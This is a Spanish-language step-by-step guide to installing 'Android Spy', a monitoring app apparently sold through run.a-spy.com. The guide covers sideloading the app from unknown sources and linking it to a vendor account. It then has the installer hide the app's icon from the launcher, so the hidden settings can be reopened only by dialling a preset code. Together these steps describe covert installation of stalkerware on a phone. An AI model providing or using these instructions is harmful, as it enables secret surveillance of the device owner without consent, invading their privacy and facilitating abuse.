Instrucciones para instalar Android Spy

1. Inicie el navegador de Internet en el dispositivo.
2. Ir a la URL https://run.a-spy.com.
3. Por favor, introduzca la dirección de correo electrónico y la contraseña de la cuenta que creó en https://run.a-spy.com. Toque en «Iniciar sesión».
4. Toque en «Navegación». Si tiene una pantalla más grande, continúe con el siguiente paso.
5. Toque en «Descargar».
6. Toque en «Descargar» y descargue la aplicación.
7. Abra el campo de notificación y toque en la descarga completa.
8. Toque en «Ajustes».
9. Toque en «Fuentes desconocidas».
10. Toque en «Aceptar».
11. Toque en «Siguiente».
12. Toque en «Instalar».
13. Toque en «Abrir».
14. Toque en «Acepto».
15. Por favor, introduzca la dirección de correo electrónico y la contraseña de la cuenta que creó en https://run.a-spy.com. Toque en «Aceptar».
16. Toque en «Aceptar».
17. Ahora puede ocultar el icono en el lanzador.
18. Toque en «Cerrar», si no desea realizar ningún cambio en la configuración.
19. Para volver a abrir la configuración, inicie la aplicación del teléfono.
20. Introduzca el número de teléfono que se ha configurado en los ajustes y pulse «Llamar». El número de teléfono está preestablecido: 0000. Si no recuerda este número de teléfono, los encontrará en https://run.a-spy.com bajo «Dispositivos».